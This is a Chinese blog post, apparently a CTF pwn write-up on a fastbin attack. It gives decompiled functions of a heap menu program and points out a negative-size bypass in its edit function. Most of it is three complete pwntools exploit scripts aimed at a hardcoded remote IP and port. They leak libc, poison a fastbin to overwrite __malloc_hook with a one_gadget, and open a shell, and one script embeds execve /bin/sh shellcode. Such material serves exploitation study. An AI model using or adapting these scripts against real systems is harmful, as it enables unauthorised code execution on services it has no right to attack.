PWN-fastbin attack

最新推荐文章于 2024-07-24 14:08:33 发布

Rt1Text

最新推荐文章于 2024-07-24 14:08:33 发布

阅读量165

点赞数 1

分类专栏： linux 文章标签：安全

本文链接：https://blog.csdn.net/arraylocalhost/article/details/126333047

版权

linux 专栏收录该内容

4 篇文章 0 订阅

订阅专栏

IDA

1.menu

2.ADD

unsigned __int64 add()
{
  unsigned int i; // [rsp+8h] [rbp-1018h]
  unsigned int v2; // [rsp+Ch] [rbp-1014h]
  char v3[4096]; // [rsp+10h] [rbp-1010h] BYREF
  unsigned __int64 v4; // [rsp+1018h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  memset(v3, 0, sizeof(v3));
  for ( i = 0; i <= 9; ++i )
  {
    if ( !*(&ptr + i) )
    {
      v2 = i;
      break;
    }
  }
  if ( i == 11 )
  {
    puts("wrong");
    exit(0);
  }
  *(&ptr + v2) = malloc(0x60uLL);
  Size[v2] = 96;
  puts("Done");
  return __readfsqword(0x28u) ^ v4;
}

3.EDIT

unsigned __int64 edit()
{
  int nbytes; // [rsp+0h] [rbp-10h] BYREF
  unsigned int nbytes_4; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("Index:");
  __isoc99_scanf("%d", &nbytes_4);
  puts("Size:");
  __isoc99_scanf("%d", &nbytes);
  if ( nbytes <= 96 )
  {
    if ( *(&ptr + nbytes_4) )
    {
      puts("Content:");
      read(0, *(&ptr + nbytes_4), (unsigned int)nbytes);
    }
    else
    {
      puts("wrong");
    }
  }
  else
  {
    puts("wrong!");
  }
  return __readfsqword(0x28u) ^ v3;
}

无符号整型,整数溢出

4.Show

unsigned __int64 show()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Index:");
  __isoc99_scanf("%d", &v1);
  if ( *(&ptr + v1) )
    printf("Content: %s\n", (const char *)*(&ptr + v1));
  return __readfsqword(0x28u) ^ v2;
}

5.delete

unsigned __int64 delete()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Index:");
  __isoc99_scanf("%d", &v1);
  if ( v1 > 0xB )
  {
    puts("wrong");
    exit(0);
  }
  free(*(&ptr + v1));
  *(&ptr + v1) = 0LL;
  Size[v1] = 0;
  return __readfsqword(0x28u) ^ v2;
}

EXP

from pwn import *
#io=process("./pwn")
io=remote("106.54.163.94", 20017)
elf=ELF("./pwn")
libc=ELF("./libc-2.23.so")

def dbg():
	gdb.attach(io)
	pause()

def cmd(choice):
	io.recvuntil(">>")
	io.sendline(str(choice))

def add():
	cmd(1)

def delete(index):
	cmd(2)
	io.recvuntil("Index:")
	io.sendline(str(index))

def show(index):
	cmd(3)
	io.recvuntil("Index:")
	io.sendline(str(index))

def edit(index,size,content):
	cmd(4)
	io.recvuntil("Index:")
	io.sendline(str(index))
	io.recvuntil("Size:")
	io.sendline(str(size))
	io.recvuntil("Content:")
	io.send(content)

add()#0
add()#1
add()#2
add()#3
payload=b'A'*0x60+p64(0)+p64(0xe1)
edit(0,-1,payload)
delete(1)
add()#1
show(2)
malloc_hook=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-88-0x10
print('malloc_hook:'+hex(malloc_hook))
base=malloc_hook-libc.sym['__malloc_hook']
onegadget=base+0x4527a
delete(1)
edit(0,-1,b'A'*0x60+p64(0)+p64(0x71)+p64(malloc_hook-0x23))
add()#1
add()#4
edit(4,-1,b'\x00'*0x13+p64(onegadget))
add()

io.interactive()

from pwn import *
context(os='linux', arch='amd64', log_level='debug')

#io = process("./pwn")
io = remote("106.54.163.94", 20017)
elf = ELF("./pwn")
libc = ELF("./libc-2.23.so")

def add():
	io.sendlineafter(">> ", "1")

def delete(idx):
	io.sendlineafter(">> ", "2")
	io.sendlineafter("Index:", str(idx))

def show(idx):
	io.sendlineafter(">> ", "3")
	io.sendlineafter("Index:", str(idx))

def edit(idx, size, content):
	io.sendlineafter(">> ", "4")
	io.sendlineafter("Index:", str(idx))
	io.sendlineafter("Size:", str(size))
	io.sendlineafter("Content:", content)

def attach():
	gdb.attach(io)
	pause()

# leak libc_base
add()  #0
add()  #1
add()  #2
add()  #3

edit(0, -1, b'\x00'*0x68 + p64(0x70*2+1))
delete(1)
add()  #1
show(2)
libc_base = u64(io.recvuntil("\x7f")[-6:].ljust(8, b'\x00')) - 0x3c4b78
print("[+]libc base = " + str(hex(libc_base)))

malloc_hook = libc_base + libc.symbols['__malloc_hook']
fake_chunk = malloc_hook - 0x23
sh = [0x45226, 0x4527a, 0xf03a4, 0xf1247]

delete(1)
edit(0, -1, b'\x00'*0x68 + p64(0x71) + p64(fake_chunk))
add()  #1
add()  #4  fack_chunk
edit(4, 0x30, b'\x00'*0x13 + p64(libc_base + sh[1])) # modify
add()  #trigger
io.interactive()

#encoding = utf-8
from pwn import *
from LibcSearcher import * 

context(log_level = 'debug', os = 'linux', arch = 'amd64')

local = 3
if local == 1 :
	sh = process([b"./ld.so", b"./pwn"], env = {"LD_PRELOAD" : b"./libc.so.6"})
elif local == 2 :
    sh = process("./pwn")
else :
	sh = remote('106.54.163.94', 20017)

elf = ELF('./pwn')
libc = ELF('./libc-2.23.so')

def dbg():
    gdb.attach(sh)
    pause()

s       = lambda data               :sh.send(data)
sa      = lambda text, data         :sh.sendafter(text, data)
sl      = lambda data               :sh.sendline(data)
sla     = lambda text, data         :sh.sendlineafter(text, data)
r       = lambda num                :sh.recv(num)
ru      = lambda text               :sh.recvuntil(text)
uu32    = lambda                    :u32(sh.recvuntil("\xf7")[-4:].ljust(4, b"\x00"))
uu64    = lambda                    :u64(sh.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
lg      = lambda s                  :sh.success('\033[32m%s -> 0x%x\033[0m' % (s, eval(s)))
lgl     = lambda s, value           :sh.success('\033[32m%s -> 0x%x\033[0m' % (s, value))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes

#------------------------------------------------------------------------------------------------------#

'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

def add():      # malloc(0x60)
    sla('>> ', b'1')

def delete(idx):
    sla('>> ', b'2')
    sla('Index:', str(idx))

def show(idx):
    sla('>> ', b'3')
    sla('Index:', str(idx))

def edit(idx, size, content):
    sla('>> ', b'4')
    sla('Index:', str(idx))
    sla('Size:', str(size))
    sa('Content:', content)

add()   # 0
add()   # 1
add()   # 2
add()   # 3
add()   # 4
add()   # 5

pld = b'\x00' * 0x68 + p64(0x70 * 2 + 1)
edit(0, -1, pld)
delete(1)
add()   # 1
show(2)

libc_base = uu64() - 0x3c4b78
lg('libc_base')
ogg = libc_base + 0x4527a
malloc_hook = libc_base + libc.sym['__malloc_hook']
fake_chunk = malloc_hook - 0x20 - 3
lg('malloc_hook')
lg('fake_chunk')

delete(4)
pld = b'\x00' * 0x68 + p64(0x71) + p64(fake_chunk)
edit(3, -1, pld)

add()   # 4
add()   # 6
pld = b'\x00' * (0x10 + 3) + p64(ogg)
edit(6, -1, pld)
# dbg()
add()

sh.interactive()